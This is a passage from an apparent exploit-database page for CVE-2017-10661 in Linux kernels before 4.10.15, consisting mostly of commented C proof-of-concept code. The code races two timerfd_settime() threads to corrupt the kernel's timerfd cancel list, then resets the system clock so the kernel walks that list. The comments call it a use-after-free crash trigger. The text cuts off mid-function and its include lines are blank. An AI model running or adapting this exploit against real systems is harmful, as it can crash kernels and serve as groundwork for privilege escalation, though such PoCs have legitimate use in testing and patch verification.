Linux kernel < 4.10.15 - Race Condition Privilege Escalation

Properties

Published:
19.12.2017
Target:
Linux kernel < 4.10.15

Code

/*
 * PoC for CVE-2017-10661 (fs/timerfd.c, fixed in 4.10.15): races timerfd_settime()
 * with and without TFD_TIMER_CANCEL_ON_SET on a single fd to corrupt the timerfd
 * cancel list, then sets the wall clock so the kernel walks that list.
 * Triggers a KASan-reported UAF on kernel 4.10 -- this is a crash trigger, not a
 * weaponised privilege escalation.
 */
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
/* Presumably the number of race attempts; its only use is in do_race(), below. */
#define RACE_TIME 1000000
/* The single timerfd both racing threads call timerfd_settime() on. */
int fd;
/* Not referenced by any code visible here. */
int fd_dumb;
/* Attempt counter read by post_race() to offset the clock value it sets. */
int count=0;
 
 
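/*
 * Thread body: arm the shared timerfd `fd` with TFD_TIMER_CANCEL_ON_SET.
 * Per timerfd_settime(2) that flag asks the kernel to cancel the timer when
 * the realtime clock is set, i.e. it queues the timerfd on the kernel's
 * cancel list.  This is the "add" side of the CVE-2017-10661 race; the
 * partner thread (list_del_thread) re-arms the same fd without the flag.
 *
 * The original used the bare value 3, which is
 * TFD_TIMER_ABSTIME | TFD_TIMER_CANCEL_ON_SET; the named flags are used here
 * so the intent is visible.  Failure is only reported via perror().
 *
 * arg: unused (pthread entry-point signature).  Returns NULL.
 */
void *list_add_thread(void *arg)
{
    (void)arg;

    /* Same 100 s values as the other thread; only the flags differ. */
    const struct itimerspec spec = {
        .it_interval = { .tv_sec = 100, .tv_nsec = 100 },
        .it_value    = { .tv_sec = 100, .tv_nsec = 100 },
    };

    /* The original's while(i<1) loop ran exactly once; make that explicit. */
    if (timerfd_settime(fd, TFD_TIMER_ABSTIME | TFD_TIMER_CANCEL_ON_SET,
                        &spec, NULL) < 0) {
        perror("timerfd settime failed !");
    }

    return NULL;
}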
 
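/*
 * Thread body: re-arm the shared timerfd `fd` WITHOUT TFD_TIMER_CANCEL_ON_SET.
 * Per timerfd_settime(2) this drops the cancel-on-clock-set behaviour, i.e.
 * it dequeues the timerfd from the kernel's cancel list.  This is the
 * "remove" side of the CVE-2017-10661 race against list_add_thread().
 *
 * The original used the bare value 1, which is TFD_TIMER_ABSTIME; the named
 * flag is used here so the difference from the add thread is obvious.
 * Failure is only reported via perror().
 *
 * arg: unused (pthread entry-point signature).  Returns NULL.
 */
void *list_del_thread(void *arg)
{
    (void)arg;

    /* Same 100 s values as the other thread; only the flags differ. */
    const struct itimerspec spec = {
        .it_interval = { .tv_sec = 100, .tv_nsec = 100 },
        .it_value    = { .tv_sec = 100, .tv_nsec = 100 },
    };

    /* The original's while(i<1) loop ran exactly once; make that explicit. */
    if (timerfd_settime(fd, TFD_TIMER_ABSTIME, &spec, NULL) < 0) {
        perror("timerfd settime failed !");
    }

    return NULL;
}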
 
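/*
 * Trigger step, run after the add/remove race: setting the realtime clock is
 * what makes the kernel visit the timerfd cancel list (the CVE-2017-10661
 * fix describes a dangling entry being dereferenced there).
 *
 * Caveats a tester should know before running this:
 *  - settimeofday(2) requires CAP_SYS_TIME.  Unprivileged, it fails with
 *    EPERM and this step does nothing beyond printing the error, so the
 *    trigger itself is not an unprivileged action.
 *  - The value written is absolute: roughly two minutes after the Unix
 *    epoch, advanced by 2 s per attempt via the global `count` (presumably
 *    bumped by the caller between attempts).  This rewinds the host's
 *    wall clock to 1970 -- run only inside a disposable VM.
 *
 * The original also built an unused struct itimerspec and an unused loop
 * counter; both are dropped.  Always returns 0; failure is reported only
 * via perror(), exactly as before.
 */
int post_race(void)
{
    struct timeval tv = {
        .tv_sec  = 120 + count * 2,
        .tv_usec = 100,
    };

    if (settimeofday(&tv, NULL) < 0) {
        perror("settimeofday");
    }
    return 0;
}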
 
int do_race(){
    int ret_add[2];
    int i;
    int j;
    pthread_t th[2]={0};
 
    i=0;
    while(i